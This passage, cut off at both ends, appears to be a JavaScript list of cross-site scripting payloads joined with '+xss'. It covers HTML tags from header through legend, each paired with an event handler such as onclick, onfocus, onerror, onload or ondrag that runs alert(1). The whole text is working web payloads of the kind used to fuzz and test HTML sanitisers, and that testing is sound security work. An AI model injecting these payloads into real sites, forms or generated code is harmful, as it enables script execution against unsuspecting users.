onbeforedeactivate=alert(1)></header><input autofocus>' +xss,'<header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus>' +xss,'<header id=x tabindex=1 onfocus=alert(1)></header>' +xss,'<header id=x tabindex=1 onfocusin=alert(1)></header>' +xss,'<header onbeforecopy="alert(1)" contenteditable>test</header>' +xss,'<header onbeforecut="alert(1)" contenteditable>test</header>' +xss,'<header onbeforepaste="alert(1)" contenteditable>test</header>' +xss,'<header onblur=alert(1) tabindex=1 id=x></header><input autofocus>' +xss,'<header onclick="alert(1)">test</header>' +xss,'<header oncontextmenu="alert(1)">test</header>' +xss,'<header oncopy="alert(1)" contenteditable>test</header>' +xss,'<header oncut="alert(1)" contenteditable>test</header>' +xss,'<header ondblclick="alert(1)">test</header>' +xss,'<header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus>' +xss,'<header onkeydown="alert(1)" contenteditable>test</header>' +xss,'<header onkeypress="alert(1)" contenteditable>test</header>' +xss,'<header onkeyup="alert(1)" contenteditable>test</header>' +xss,'<header onmousedown="alert(1)">test</header>' +xss,'<header onmouseenter="alert(1)">test</header>' +xss,'<header onmouseleave="alert(1)">test</header>' +xss,'<header onmousemove="alert(1)">test</header>' +xss,'<header onmouseout="alert(1)">test</header>' +xss,'<header onmouseover="alert(1)">test</header>' +xss,'<header onmouseup="alert(1)">test</header>' +xss,'<header onpaste="alert(1)" contenteditable>test</header>' +xss,'<hgroup draggable="true" ondrag="alert(1)">test</hgroup>' +xss,'<hgroup draggable="true" ondragend="alert(1)">test</hgroup>' +xss,'<hgroup draggable="true" ondragenter="alert(1)">test</hgroup>' +xss,'<hgroup draggable="true" ondragleave="alert(1)">test</hgroup>' +xss,'<hgroup draggable="true" ondragstart="alert(1)">test</hgroup>' +xss,'<hgroup id=x tabindex=1 onactivate=alert(1)></hgroup>' +xss,'<hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup>' +xss,'<hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus>' +xss,'<hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus>' +xss,'<hgroup id=x tabindex=1 onfocus=alert(1)></hgroup>' +xss,'<hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup>' +xss,'<hgroup onbeforecopy="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup onbeforecut="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup onbeforepaste="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus>' +xss,'<hgroup onclick="alert(1)">test</hgroup>' +xss,'<hgroup oncontextmenu="alert(1)">test</hgroup>' +xss,'<hgroup oncopy="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup oncut="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup ondblclick="alert(1)">test</hgroup>' +xss,'<hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus>' +xss,'<hgroup onkeydown="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup onkeypress="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup onkeyup="alert(1)" contenteditable>test</hgroup>' +xss,'<hgroup onmousedown="alert(1)">test</hgroup>' +xss,'<hgroup onmouseenter="alert(1)">test</hgroup>' +xss,'<hgroup onmouseleave="alert(1)">test</hgroup>' +xss,'<hgroup onmousemove="alert(1)">test</hgroup>' +xss,'<hgroup onmouseout="alert(1)">test</hgroup>' +xss,'<hgroup onmouseover="alert(1)">test</hgroup>' +xss,'<hgroup onmouseup="alert(1)">test</hgroup>' +xss,'<hgroup onpaste="alert(1)" contenteditable>test</hgroup>' +xss,'<hr draggable="true" ondrag="alert(1)">test</hr>' +xss,'<hr draggable="true" ondragend="alert(1)">test</hr>' +xss,'<hr draggable="true" ondragenter="alert(1)">test</hr>' +xss,'<hr draggable="true" ondragleave="alert(1)">test</hr>' +xss,'<hr draggable="true" ondragstart="alert(1)">test</hr>' +xss,'<hr id=x tabindex=1 onactivate=alert(1)></hr>' +xss,'<hr id=x tabindex=1 onbeforeactivate=alert(1)></hr>' +xss,'<hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus>' +xss,'<hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus>' +xss,'<hr id=x tabindex=1 onfocus=alert(1)></hr>' +xss,'<hr id=x tabindex=1 onfocusin=alert(1)></hr>' +xss,'<hr onbeforecopy="alert(1)" contenteditable>test</hr>' +xss,'<hr onbeforecut="alert(1)" contenteditable>test</hr>' +xss,'<hr onbeforepaste="alert(1)" contenteditable>test</hr>' +xss,'<hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus>' +xss,'<hr onclick="alert(1)">test</hr>' +xss,'<hr oncontextmenu="alert(1)">test</hr>' +xss,'<hr oncopy="alert(1)" contenteditable>test</hr>' +xss,'<hr oncut="alert(1)" contenteditable>test</hr>' +xss,'<hr ondblclick="alert(1)">test</hr>' +xss,'<hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus>' +xss,'<hr onkeydown="alert(1)" contenteditable>test</hr>' +xss,'<hr onkeypress="alert(1)" contenteditable>test</hr>' +xss,'<hr onkeyup="alert(1)" contenteditable>test</hr>' +xss,'<hr onmousedown="alert(1)">test</hr>' +xss,'<hr onmouseenter="alert(1)">test</hr>' +xss,'<hr onmouseleave="alert(1)">test</hr>' +xss,'<hr onmousemove="alert(1)">test</hr>' +xss,'<hr onmouseout="alert(1)">test</hr>' +xss,'<hr onmouseover="alert(1)">test</hr>' +xss,'<hr onmouseup="alert(1)">test</hr>' +xss,'<hr onpaste="alert(1)" contenteditable>test</hr>' +xss,'<html draggable="true" ondrag="alert(1)">test</html>' +xss,'<html draggable="true" ondragend="alert(1)">test</html>' +xss,'<html draggable="true" ondragenter="alert(1)">test</html>' +xss,'<html draggable="true" ondragleave="alert(1)">test</html>' +xss,'<html draggable="true" ondragstart="alert(1)">test</html>' +xss,'<html id=x tabindex=1 onactivate=alert(1)></html>' +xss,'<html id=x tabindex=1 onbeforeactivate=alert(1)></html>' +xss,'<html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus>' +xss,'<html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus>' +xss,'<html id=x tabindex=1 onfocus=alert(1)></html>' +xss,'<html id=x tabindex=1 onfocusin=alert(1)></html>' +xss,'<html onbeforecopy="alert(1)" contenteditable>test</html>' +xss,'<html onbeforecut="alert(1)" contenteditable>test</html>' +xss,'<html onbeforepaste="alert(1)" contenteditable>test</html>' +xss,'<html onblur=alert(1) tabindex=1 id=x></html><input autofocus>' +xss,'<html onclick="alert(1)">test</html>' +xss,'<html oncontextmenu="alert(1)">test</html>' +xss,'<html oncopy="alert(1)" contenteditable>test</html>' +xss,'<html oncut="alert(1)" contenteditable>test</html>' +xss,'<html ondblclick="alert(1)">test</html>' +xss,'<html onfocusout=alert(1) tabindex=1 id=x></html><input autofocus>' +xss,'<html onkeydown="alert(1)" contenteditable>test</html>' +xss,'<html onkeypress="alert(1)" contenteditable>test</html>' +xss,'<html onkeyup="alert(1)" contenteditable>test</html>' +xss,'<html onmousedown="alert(1)">test</html>' +xss,'<html onmouseenter="alert(1)">test</html>' +xss,'<html onmouseleave="alert(1)">test</html>' +xss,'<html onmousemove="alert(1)">test</html>' +xss,'<html onmouseout="alert(1)">test</html>' +xss,'<html onmouseover="alert(1)">test</html>' +xss,'<html onmouseup="alert(1)">test</html>' +xss,'<html onpaste="alert(1)" contenteditable>test</html>' +xss,'<i draggable="true" ondrag="alert(1)">test</i>' +xss,'<i draggable="true" ondragend="alert(1)">test</i>' +xss,'<i draggable="true" ondragenter="alert(1)">test</i>' +xss,'<i draggable="true" ondragleave="alert(1)">test</i>' +xss,'<i draggable="true" ondragstart="alert(1)">test</i>' +xss,'<i id=x tabindex=1 onactivate=alert(1)></i>' +xss,'<i id=x tabindex=1 onbeforeactivate=alert(1)></i>' +xss,'<i id=x tabindex=1 onbeforedeactivate=alert(1)></i><input autofocus>' +xss,'<i id=x tabindex=1 ondeactivate=alert(1)></i><input id=y autofocus>' +xss,'<i id=x tabindex=1 onfocus=alert(1)></i>' +xss,'<i id=x tabindex=1 onfocusin=alert(1)></i>' +xss,'<i onbeforecopy="alert(1)" contenteditable>test</i>' +xss,'<i onbeforecut="alert(1)" contenteditable>test</i>' +xss,'<i onbeforepaste="alert(1)" contenteditable>test</i>' +xss,'<i onblur=alert(1) tabindex=1 id=x></i><input autofocus>' +xss,'<i onclick="alert(1)">test</i>' +xss,'<i oncontextmenu="alert(1)">test</i>' +xss,'<i oncopy="alert(1)" contenteditable>test</i>' +xss,'<i oncut="alert(1)" contenteditable>test</i>' +xss,'<i ondblclick="alert(1)">test</i>' +xss,'<i onfocusout=alert(1) tabindex=1 id=x></i><input autofocus>' +xss,'<i onkeydown="alert(1)" contenteditable>test</i>' +xss,'<i onkeypress="alert(1)" contenteditable>test</i>' +xss,'<i onkeyup="alert(1)" contenteditable>test</i>' +xss,'<i onmousedown="alert(1)">test</i>' +xss,'<i onmouseenter="alert(1)">test</i>' +xss,'<i onmouseleave="alert(1)">test</i>' +xss,'<i onmousemove="alert(1)">test</i>' +xss,'<i onmouseout="alert(1)">test</i>' +xss,'<i onmouseover="alert(1)">test</i>' +xss,'<i onmouseup="alert(1)">test</i>' +xss,'<i onpaste="alert(1)" contenteditable>test</i>' +xss,'<iframe draggable="true" ondrag="alert(1)">test</iframe>' +xss,'<iframe draggable="true" ondragend="alert(1)">test</iframe>' +xss,'<iframe draggable="true" ondragenter="alert(1)">test</iframe>' +xss,'<iframe draggable="true" ondragleave="alert(1)">test</iframe>' +xss,'<iframe draggable="true" ondragstart="alert(1)">test</iframe>' +xss,'<iframe id=x onfocus=alert(1)>' +xss,'<iframe id=x onfocusin=alert(1)>' +xss,'<iframe id=x tabindex=1 onactivate=alert(1)></iframe>' +xss,'<iframe id=x tabindex=1 onbeforeactivate=alert(1)></iframe>' +xss,'<iframe id=x tabindex=1 onbeforedeactivate=alert(1)></iframe><input autofocus>' +xss,'<iframe id=x tabindex=1 ondeactivate=alert(1)></iframe><input id=y autofocus>' +xss,'<iframe onbeforecopy="alert(1)" contenteditable>test</iframe>' +xss,'<iframe onbeforecut="alert(1)" contenteditable>test</iframe>' +xss,'<iframe onbeforepaste="alert(1)" contenteditable>test</iframe>' +xss,'<iframe onblur=alert(1) id=x><input autofocus>' +xss,'<iframe onclick="alert(1)">test</iframe>' +xss,'<iframe oncontextmenu="alert(1)">test</iframe>' +xss,'<iframe oncopy="alert(1)" contenteditable>test</iframe>' +xss,'<iframe oncut="alert(1)" contenteditable>test</iframe>' +xss,'<iframe ondblclick="alert(1)">test</iframe>' +xss,'<iframe onfocusout=alert(1) id=x><input autofocus>' +xss,'<iframe onkeydown="alert(1)" contenteditable>test</iframe>' +xss,'<iframe onkeypress="alert(1)" contenteditable>test</iframe>' +xss,'<iframe onkeyup="alert(1)" contenteditable>test</iframe>' +xss,'<iframe onload=alert(1)></iframe>' +xss,'<iframe onmousedown="alert(1)">test</iframe>' +xss,'<iframe onmouseenter="alert(1)">test</iframe>' +xss,'<iframe onmouseleave="alert(1)">test</iframe>' +xss,'<iframe onmousemove="alert(1)">test</iframe>' +xss,'<iframe onmouseout="alert(1)">test</iframe>' +xss,'<iframe onmouseover="alert(1)">test</iframe>' +xss,'<iframe onmouseup="alert(1)">test</iframe>' +xss,'<iframe onpaste="alert(1)" contenteditable>test</iframe>' +xss,'<iframe onreadystatechange=alert(1)></iframe>' +xss,'<image draggable="true" ondrag="alert(1)">test</image>' +xss,'<image draggable="true" ondragend="alert(1)">test</image>' +xss,'<image draggable="true" ondragenter="alert(1)">test</image>' +xss,'<image draggable="true" ondragleave="alert(1)">test</image>' +xss,'<image draggable="true" ondragstart="alert(1)">test</image>' +xss,'<image id=x tabindex=1 onactivate=alert(1)></image>' +xss,'<image id=x tabindex=1 onbeforeactivate=alert(1)></image>' +xss,'<image id=x tabindex=1 onbeforedeactivate=alert(1)></image><input autofocus>' +xss,'<image id=x tabindex=1 ondeactivate=alert(1)></image><input id=y autofocus>' +xss,'<image id=x tabindex=1 onfocus=alert(1)></image>' +xss,'<image id=x tabindex=1 onfocusin=alert(1)></image>' +xss,'<image onbeforecopy="alert(1)" contenteditable>test</image>' +xss,'<image onbeforecut="alert(1)" contenteditable>test</image>' +xss,'<image onbeforepaste="alert(1)" contenteditable>test</image>' +xss,'<image onblur=alert(1) tabindex=1 id=x></image><input autofocus>' +xss,'<image onclick="alert(1)">test</image>' +xss,'<image oncontextmenu="alert(1)">test</image>' +xss,'<image oncopy="alert(1)" contenteditable>test</image>' +xss,'<image oncut="alert(1)" contenteditable>test</image>' +xss,'<image ondblclick="alert(1)">test</image>' +xss,'<image onfocusout=alert(1) tabindex=1 id=x></image><input autofocus>' +xss,'<image onkeydown="alert(1)" contenteditable>test</image>' +xss,'<image onkeypress="alert(1)" contenteditable>test</image>' +xss,'<image onkeyup="alert(1)" contenteditable>test</image>' +xss,'<image onmousedown="alert(1)">test</image>' +xss,'<image onmouseenter="alert(1)">test</image>' +xss,'<image onmouseleave="alert(1)">test</image>' +xss,'<image onmousemove="alert(1)">test</image>' +xss,'<image onmouseout="alert(1)">test</image>' +xss,'<image onmouseover="alert(1)">test</image>' +xss,'<image onmouseup="alert(1)">test</image>' +xss,'<image onpaste="alert(1)" contenteditable>test</image>' +xss,'<image src/onerror=alert(1)>' +xss,'<image src=validimage.png onload=alert(1)>' +xss,'<image src=validimage.png onloadend=alert(1)>' +xss,'<image src=validimage.png onloadstart=alert(1)>' +xss,'<image srcset=1 onerror=alert(1)>' +xss,'<img draggable="true" ondrag="alert(1)">test</img>' +xss,'<img draggable="true" ondragend="alert(1)">test</img>' +xss,'<img draggable="true" ondragenter="alert(1)">test</img>' +xss,'<img draggable="true" ondragleave="alert(1)">test</img>' +xss,'<img draggable="true" ondragstart="alert(1)">test</img>' +xss,'<img id=x tabindex=1 onactivate=alert(1)></img>' +xss,'<img id=x tabindex=1 onbeforeactivate=alert(1)></img>' +xss,'<img id=x tabindex=1 onbeforedeactivate=alert(1)></img><input autofocus>' +xss,'<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus>' +xss,'<img id=x tabindex=1 onfocus=alert(1)></img>' +xss,'<img id=x tabindex=1 onfocusin=alert(1)></img>' +xss,'<img onbeforecopy="alert(1)" contenteditable>test</img>' +xss,'<img onbeforecut="alert(1)" contenteditable>test</img>' +xss,'<img onbeforepaste="alert(1)" contenteditable>test</img>' +xss,'<img onblur=alert(1) tabindex=1 id=x></img><input autofocus>' +xss,'<img onclick="alert(1)">test</img>' +xss,'<img oncontextmenu="alert(1)">test</img>' +xss,'<img oncopy="alert(1)" contenteditable>test</img>' +xss,'<img oncut="alert(1)" contenteditable>test</img>' +xss,'<img ondblclick="alert(1)">test</img>' +xss,'<img onfocusout=alert(1) tabindex=1 id=x></img><input autofocus>' +xss,'<img onkeydown="alert(1)" contenteditable>test</img>' +xss,'<img onkeypress="alert(1)" contenteditable>test</img>' +xss,'<img onkeyup="alert(1)" contenteditable>test</img>' +xss,'<img onmousedown="alert(1)">test</img>' +xss,'<img onmouseenter="alert(1)">test</img>' +xss,'<img onmouseleave="alert(1)">test</img>' +xss,'<img onmousemove="alert(1)">test</img>' +xss,'<img onmouseout="alert(1)">test</img>' +xss,'<img onmouseover="alert(1)">test</img>' +xss,'<img onmouseup="alert(1)">test</img>' +xss,'<img onpaste="alert(1)" contenteditable>test</img>' +xss,'<img src/onerror=alert(1)>' +xss,'<img src=validimage.png onload=alert(1)>' +xss,'<img src=validimage.png onloadend=alert(1)>' +xss,'<img src=validimage.png onloadstart=alert(1)>' +xss,'<img srcset=1 onerror=alert(1)>' +xss,'<img srcset=validimage.png onload=alert(1)>' +xss,'<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>' +xss,'<img usemap=#x><map name="x"><area href onfocusin=alert(1) id=x>' +xss,'<input autofocus onfocus=alert(1)>' +xss,'<input autofocus onfocusin=alert(1)>' +xss,'<input draggable="true" ondrag="alert(1)">test</input>' +xss,'<input draggable="true" ondragend="alert(1)">test</input>' +xss,'<input draggable="true" ondragenter="alert(1)">test</input>' +xss,'<input draggable="true" ondragleave="alert(1)">test</input>' +xss,'<input draggable="true" ondragstart="alert(1)">test</input>' +xss,'<input id=x onfocus=alert(1)>' +xss,'<input id=x onfocusin=alert(1)>' +xss,'<input id=x tabindex=1 onactivate=alert(1)></input>' +xss,'<input id=x tabindex=1 onbeforeactivate=alert(1)></input>' +xss,'<input id=x tabindex=1 onbeforedeactivate=alert(1)></input><input autofocus>' +xss,'<input id=x tabindex=1 ondeactivate=alert(1)></input><input id=y autofocus>' +xss,'<input onauxclick=alert(1)>' +xss,'<input onbeforecopy=alert(1) value="XSS" autofocus>' +xss,'<input onbeforecut=alert(1) value="XSS" autofocus>' +xss,'<input onbeforepaste=alert(1) value="" autofocus>' +xss,'<input onblur=alert(1) id=x><input autofocus>' +xss,'<input onchange=alert(1) value=xss>' +xss,'<input onclick="alert(1)">test</input>' +xss,'<input oncontextmenu="alert(1)">test</input>' +xss,'<input oncopy=alert(1) value="XSS" autofocus>' +xss,'<input oncut=alert(1) value="XSS" autofocus>' +xss,'<input ondblclick="alert(1)">test</input>' +xss,'<input onfocusout=alert(1) id=x><input autofocus>' +xss,'<input oninput=alert(1) value=xss>' +xss,'<input onkeydown="alert(1)" contenteditable>test</input>' +xss,'<input onkeypress="alert(1)" contenteditable>test</input>' +xss,'<input onkeyup="alert(1)" contenteditable>test</input>' +xss,'<input onmousedown="alert(1)">test</input>' +xss,'<input onmouseenter="alert(1)">test</input>' +xss,'<input onmouseleave="alert(1)">test</input>' +xss,'<input onmousemove="alert(1)">test</input>' +xss,'<input onmouseout="alert(1)">test</input>' +xss,'<input onmouseover="alert(1)">test</input>' +xss,'<input onmouseup="alert(1)">test</input>' +xss,'<input onpaste=alert(1) value="" autofocus>' +xss,'<input onselect=alert(1) value="XSS" autofocus>' +xss,'<input type=checkbox id=x onfocus=alert(1)>' +xss,'<input type=checkbox id=x onfocusin=alert(1)>' +xss,'<input type=image onloadend=alert(1) src=validimage.png>' +xss,'<input type=image onloadstart=alert(1) src=validimage.png>' +xss,'<input type=image src=1 onerror=alert(1)>' +xss,'<input type=image src=validimage.png onload=alert(1)>' +xss,'<input type=radio id=x onfocus=alert(1)>' +xss,'<input type=radio id=x onfocusin=alert(1)>' +xss,'<ins draggable="true" ondrag="alert(1)">test</ins>' +xss,'<ins draggable="true" ondragend="alert(1)">test</ins>' +xss,'<ins draggable="true" ondragenter="alert(1)">test</ins>' +xss,'<ins draggable="true" ondragleave="alert(1)">test</ins>' +xss,'<ins draggable="true" ondragstart="alert(1)">test</ins>' +xss,'<ins id=x tabindex=1 onactivate=alert(1)></ins>' +xss,'<ins id=x tabindex=1 onbeforeactivate=alert(1)></ins>' +xss,'<ins id=x tabindex=1 onbeforedeactivate=alert(1)></ins><input autofocus>' +xss,'<ins id=x tabindex=1 ondeactivate=alert(1)></ins><input id=y autofocus>' +xss,'<ins id=x tabindex=1 onfocus=alert(1)></ins>' +xss,'<ins id=x tabindex=1 onfocusin=alert(1)></ins>' +xss,'<ins onbeforecopy="alert(1)" contenteditable>test</ins>' +xss,'<ins onbeforecut="alert(1)" contenteditable>test</ins>' +xss,'<ins onbeforepaste="alert(1)" contenteditable>test</ins>' +xss,'<ins onblur=alert(1) tabindex=1 id=x></ins><input autofocus>' +xss,'<ins onclick="alert(1)">test</ins>' +xss,'<ins oncontextmenu="alert(1)">test</ins>' +xss,'<ins oncopy="alert(1)" contenteditable>test</ins>' +xss,'<ins oncut="alert(1)" contenteditable>test</ins>' +xss,'<ins ondblclick="alert(1)">test</ins>' +xss,'<ins onfocusout=alert(1) tabindex=1 id=x></ins><input autofocus>' +xss,'<ins onkeydown="alert(1)" contenteditable>test</ins>' +xss,'<ins onkeypress="alert(1)" contenteditable>test</ins>' +xss,'<ins onkeyup="alert(1)" contenteditable>test</ins>' +xss,'<ins onmousedown="alert(1)">test</ins>' +xss,'<ins onmouseenter="alert(1)">test</ins>' +xss,'<ins onmouseleave="alert(1)">test</ins>' +xss,'<ins onmousemove="alert(1)">test</ins>' +xss,'<ins onmouseout="alert(1)">test</ins>' +xss,'<ins onmouseover="alert(1)">test</ins>' +xss,'<ins onmouseup="alert(1)">test</ins>' +xss,'<ins onpaste="alert(1)" contenteditable>test</ins>' +xss,'<isindex draggable="true" ondrag="alert(1)">test</isindex>' +xss,'<isindex draggable="true" ondragend="alert(1)">test</isindex>' +xss,'<isindex draggable="true" ondragenter="alert(1)">test</isindex>' +xss,'<isindex draggable="true" ondragleave="alert(1)">test</isindex>' +xss,'<isindex draggable="true" ondragstart="alert(1)">test</isindex>' +xss,'<isindex id=x tabindex=1 onactivate=alert(1)></isindex>' +xss,'<isindex id=x tabindex=1 onbeforeactivate=alert(1)></isindex>' +xss,'<isindex id=x tabindex=1 onbeforedeactivate=alert(1)></isindex><input autofocus>' +xss,'<isindex id=x tabindex=1 ondeactivate=alert(1)></isindex><input id=y autofocus>' +xss,'<isindex id=x tabindex=1 onfocus=alert(1)></isindex>' +xss,'<isindex id=x tabindex=1 onfocusin=alert(1)></isindex>' +xss,'<isindex onbeforecopy="alert(1)" contenteditable>test</isindex>' +xss,'<isindex onbeforecut="alert(1)" contenteditable>test</isindex>' +xss,'<isindex onbeforepaste="alert(1)" contenteditable>test</isindex>' +xss,'<isindex onblur=alert(1) tabindex=1 id=x></isindex><input autofocus>' +xss,'<isindex onclick="alert(1)">test</isindex>' +xss,'<isindex oncontextmenu="alert(1)">test</isindex>' +xss,'<isindex oncopy="alert(1)" contenteditable>test</isindex>' +xss,'<isindex oncut="alert(1)" contenteditable>test</isindex>' +xss,'<isindex ondblclick="alert(1)">test</isindex>' +xss,'<isindex onfocusout=alert(1) tabindex=1 id=x></isindex><input autofocus>' +xss,'<isindex onkeydown="alert(1)" contenteditable>test</isindex>' +xss,'<isindex onkeypress="alert(1)" contenteditable>test</isindex>' +xss,'<isindex onkeyup="alert(1)" contenteditable>test</isindex>' +xss,'<isindex onmousedown="alert(1)">test</isindex>' +xss,'<isindex onmouseenter="alert(1)">test</isindex>' +xss,'<isindex onmouseleave="alert(1)">test</isindex>' +xss,'<isindex onmousemove="alert(1)">test</isindex>' +xss,'<isindex onmouseout="alert(1)">test</isindex>' +xss,'<isindex onmouseover="alert(1)">test</isindex>' +xss,'<isindex onmouseup="alert(1)">test</isindex>' +xss,'<isindex onpaste="alert(1)" contenteditable>test</isindex>' +xss,'<isindex type=image onload=alert(1) src=validimage.png>' +xss,'<isindex type=image src=1 onerror=alert(1)>' +xss,'<kbd draggable="true" ondrag="alert(1)">test</kbd>' +xss,'<kbd draggable="true" ondragend="alert(1)">test</kbd>' +xss,'<kbd draggable="true" ondragenter="alert(1)">test</kbd>' +xss,'<kbd draggable="true" ondragleave="alert(1)">test</kbd>' +xss,'<kbd draggable="true" ondragstart="alert(1)">test</kbd>' +xss,'<kbd id=x tabindex=1 onactivate=alert(1)></kbd>' +xss,'<kbd id=x tabindex=1 onbeforeactivate=alert(1)></kbd>' +xss,'<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus>' +xss,'<kbd id=x tabindex=1 ondeactivate=alert(1)></kbd><input id=y autofocus>' +xss,'<kbd id=x tabindex=1 onfocus=alert(1)></kbd>' +xss,'<kbd id=x tabindex=1 onfocusin=alert(1)></kbd>' +xss,'<kbd onbeforecopy="alert(1)" contenteditable>test</kbd>' +xss,'<kbd onbeforecut="alert(1)" contenteditable>test</kbd>' +xss,'<kbd onbeforepaste="alert(1)" contenteditable>test</kbd>' +xss,'<kbd onblur=alert(1) tabindex=1 id=x></kbd><input autofocus>' +xss,'<kbd onclick="alert(1)">test</kbd>' +xss,'<kbd oncontextmenu="alert(1)">test</kbd>' +xss,'<kbd oncopy="alert(1)" contenteditable>test</kbd>' +xss,'<kbd oncut="alert(1)" contenteditable>test</kbd>' +xss,'<kbd ondblclick="alert(1)">test</kbd>' +xss,'<kbd onfocusout=alert(1) tabindex=1 id=x></kbd><input autofocus>' +xss,'<kbd onkeydown="alert(1)" contenteditable>test</kbd>' +xss,'<kbd onkeypress="alert(1)" contenteditable>test</kbd>' +xss,'<kbd onkeyup="alert(1)" contenteditable>test</kbd>' +xss,'<kbd onmousedown="alert(1)">test</kbd>' +xss,'<kbd onmouseenter="alert(1)">test</kbd>' +xss,'<kbd onmouseleave="alert(1)">test</kbd>' +xss,'<kbd onmousemove="alert(1)">test</kbd>' +xss,'<kbd onmouseout="alert(1)">test</kbd>' +xss,'<kbd onmouseover="alert(1)">test</kbd>' +xss,'<kbd onmouseup="alert(1)">test</kbd>' +xss,'<kbd onpaste="alert(1)" contenteditable>test</kbd>' +xss,'<keygen autofocus onfocus=alert(1)>' +xss,'<keygen autofocus onfocusin=alert(1)>' +xss,'<keygen draggable="true" ondrag="alert(1)">test</keygen>' +xss,'<keygen draggable="true" ondragend="alert(1)">test</keygen>' +xss,'<keygen draggable="true" ondragenter="alert(1)">test</keygen>' +xss,'<keygen draggable="true" ondragleave="alert(1)">test</keygen>' +xss,'<keygen draggable="true" ondragstart="alert(1)">test</keygen>' +xss,'<keygen id=x onfocus=alert(1)>' +xss,'<keygen id=x onfocusin=alert(1)>' +xss,'<keygen id=x tabindex=1 onactivate=alert(1)></keygen>' +xss,'<keygen id=x tabindex=1 onbeforeactivate=alert(1)></keygen>' +xss,'<keygen id=x tabindex=1 onbeforedeactivate=alert(1)></keygen><input autofocus>' +xss,'<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus>' +xss,'<keygen onbeforecopy="alert(1)" contenteditable>test</keygen>' +xss,'<keygen onbeforecut="alert(1)" contenteditable>test</keygen>' +xss,'<keygen onbeforepaste="alert(1)" contenteditable>test</keygen>' +xss,'<keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus>' +xss,'<keygen onclick="alert(1)">test</keygen>' +xss,'<keygen oncontextmenu="alert(1)">test</keygen>' +xss,'<keygen oncopy="alert(1)" contenteditable>test</keygen>' +xss,'<keygen oncut="alert(1)" contenteditable>test</keygen>' +xss,'<keygen ondblclick="alert(1)">test</keygen>' +xss,'<keygen onfocusout=alert(1) tabindex=1 id=x></keygen><input autofocus>' +xss,'<keygen onkeydown="alert(1)" contenteditable>test</keygen>' +xss,'<keygen onkeypress="alert(1)" contenteditable>test</keygen>' +xss,'<keygen onkeyup="alert(1)" contenteditable>test</keygen>' +xss,'<keygen onmousedown="alert(1)">test</keygen>' +xss,'<keygen onmouseenter="alert(1)">test</keygen>' +xss,'<keygen onmouseleave="alert(1)">test</keygen>' +xss,'<keygen onmousemove="alert(1)">test</keygen>' +xss,'<keygen onmouseout="alert(1)">test</keygen>' +xss,'<keygen onmouseover="alert(1)">test</keygen>' +xss,'<keygen onmouseup="alert(1)">test</keygen>' +xss,'<keygen onpaste="alert(1)" contenteditable>test</keygen>' +xss,'<label draggable="true" ondrag="alert(1)">test</label>' +xss,'<label draggable="true" ondragend="alert(1)">test</label>' +xss,'<label draggable="true" ondragenter="alert(1)">test</label>' +xss,'<label draggable="true" ondragleave="alert(1)">test</label>' +xss,'<label draggable="true" ondragstart="alert(1)">test</label>' +xss,'<label id=x tabindex=1 onactivate=alert(1)></label>' +xss,'<label id=x tabindex=1 onbeforeactivate=alert(1)></label>' +xss,'<label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus>' +xss,'<label id=x tabindex=1 ondeactivate=alert(1)></label><input id=y autofocus>' +xss,'<label id=x tabindex=1 onfocus=alert(1)></label>' +xss,'<label id=x tabindex=1 onfocusin=alert(1)></label>' +xss,'<label onbeforecopy="alert(1)" contenteditable>test</label>' +xss,'<label onbeforecut="alert(1)" contenteditable>test</label>' +xss,'<label onbeforepaste="alert(1)" contenteditable>test</label>' +xss,'<label onblur=alert(1) tabindex=1 id=x></label><input autofocus>' +xss,'<label onclick="alert(1)">test</label>' +xss,'<label oncontextmenu="alert(1)">test</label>' +xss,'<label oncopy="alert(1)" contenteditable>test</label>' +xss,'<label oncut="alert(1)" contenteditable>test</label>' +xss,'<label ondblclick="alert(1)">test</label>' +xss,'<label onfocusout=alert(1) tabindex=1 id=x></label><input autofocus>' +xss,'<label onkeydown="alert(1)" contenteditable>test</label>' +xss,'<label onkeypress="alert(1)" contenteditable>test</label>' +xss,'<label onkeyup="alert(1)" contenteditable>test</label>' +xss,'<label onmousedown="alert(1)">test</label>' +xss,'<label onmouseenter="alert(1)">test</label>' +xss,'<label onmouseleave="alert(1)">test</label>' +xss,'<label onmousemove="alert(1)">test</label>' +xss,'<label onmouseout="alert(1)">test</label>' +xss,'<label onmouseover="alert(1)">test</label>' +xss,'<label onmouseup="alert(1)">test</label>' +xss,'<label onpaste="alert(1)" contenteditable>test</label>' +xss,'<legend draggable="true" ondrag="alert(1)">test</legend>' +xss,'<legend draggable="true" ondragend="alert(1)">test</legend>' +xss,'<legend draggable="true" ondragenter="alert(1)">test</legend>' +xss,'<legend draggable="true" ondragleave="alert(1)">test</legend>' +xss,'<legend draggable="true" ondragstart="alert(1)">test</legend>' +xss,'<legend id=x tabindex=1 onactivate=alert(1)></legend>' +xss,'<legend id=x tabindex=1 onbeforeactivate=alert(1)></legend>' +xss,'<legend id=x tabindex=1 onbeforedeactivate=alert(1)></legend><input autofocus>' +xss,'<legend id=x tabindex=1 ondeactivate=alert(1)></legend><input id=y autofocus>' +xss,'<legend id=x tabindex=1 onfocus=alert(1)></legend>' +xss,'<legend id=x tabindex=1 